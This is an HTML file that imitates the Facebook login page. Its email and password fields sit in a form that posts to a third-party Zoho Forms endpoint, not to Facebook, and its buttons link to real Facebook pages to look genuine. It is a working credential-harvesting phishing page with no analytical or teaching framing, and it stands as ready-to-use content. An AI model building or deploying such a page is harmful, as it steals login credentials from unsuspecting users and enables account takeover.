<!DOCTYPE html>
<html>
    <style>
h1{
    color:#0866ff;
    margin-left:140px;
    margin-top:200px;
    font-weight:700;
    font-size:50px;
}
p{
    margin-left:140px;
    font-size:30px;
    font-family:italic;
}
.myfb{
    width:400px;
    border:1px solid grey;
    margin-left:700px;
    margin-top:-300px;
    padding:10px;
    box-shadow:2px 2px 2px 2px grey;

}
input{
    width:350px;
    margin-top:20px;
    padding:15px;
    border:1px solid lightgrey;
    border-radius:10px;

}
.but-login{
    background-color:#0866ff;
    font-weight:900;
    width:380px;
    color:#fff;
    border-radius:5px;
    border:none;
    margin-top:20px;
    padding:15px;
    
}
.bu{
    background-color:green;
    font-weight:900;
    width:280px;
    color:#fff;
    border-radius:5px;
    border:1px solid white;
    margin-top:20px;
    padding:15px;
    margin-left:50px;

}
a{
    color:#0866ff;
    margin-left:150px;
    text-decoration:none;
}
.log{
    color:#fff;
    margin-left: -25px;
    width:250px;
}
.cr{
    color:#fff;
    margin-left: -20px;
    width:200px;

}
#cele{
    margin-left:800px;
    margin-top:200px;
    padding:30px;
}
.forgot{
    margin-left:40px;
}
.sign{
    margin-left:20px;
}

    </style>
    <head>
        <title>Facebook Page</title>
    </head>
    <h1>facebook</h1>
    <p>Facebook helps you connect and share <br> with the people in your life.<br></p>
    <body>
        <div class="myfb">
<!-- Change or deletion of the name attributes in the input tag will lead to empty values on record submission-->
   <form action='https://forms.zohopublic.in/kakiletiangel/form/Facebook/formperma/W16y64ZH7R9GCOTSN_NRIRCny3Vv7ZBil6MbYs_jX28/htmlRecords/submit' name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
    <input type="hidden" name="zf_referrer_name" value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
    <input type="hidden" name="zf_redirect_url" value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
    <input type="hidden" name="zc_gad" value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
    <h2>Log in with Facebook</h2>
    <p></p>
    <!--Single Line-->
    
    <input  type="text" name="SingleLine" value="" fieldType=1 maxlength="255" placeholder="email" />
    <!--Single Line-->
    <input  type="text" name="SingleLine1" value="" fieldType=1 maxlength="255" placeholder="password" />
    <!-- <button type="submit"><em>Log in</em></button></form> -->
  
    <button class="but-login"><a href="https://www.facebook.com/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE2OTgwMTkwLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D" class="log">Log in</a></button>
    <br><br>
    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" >forgot password?</a>
            <br><br>
            <button class="bu">
            <a href="https://www.facebook.com/r.php" class="cr">Create Account</a></button>
    

   
        <!-- <form>
            <input type="text" placeholder="email or phone number">
            <br>
            <input type="password" placeholder="password">
            <br>
            <button class="but-login"><a href="https://www.facebook.com/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE2OTgwMTkwLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D" class="log">Log in</a></button>
            <br><br>
            <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" >forgot password?</a>
            <br><br>
            <button class="bu">
            <a href="https://www.facebook.com/r.php" class="cr">Create Account</a></button>
        </form>--></div>
    </body>
</html>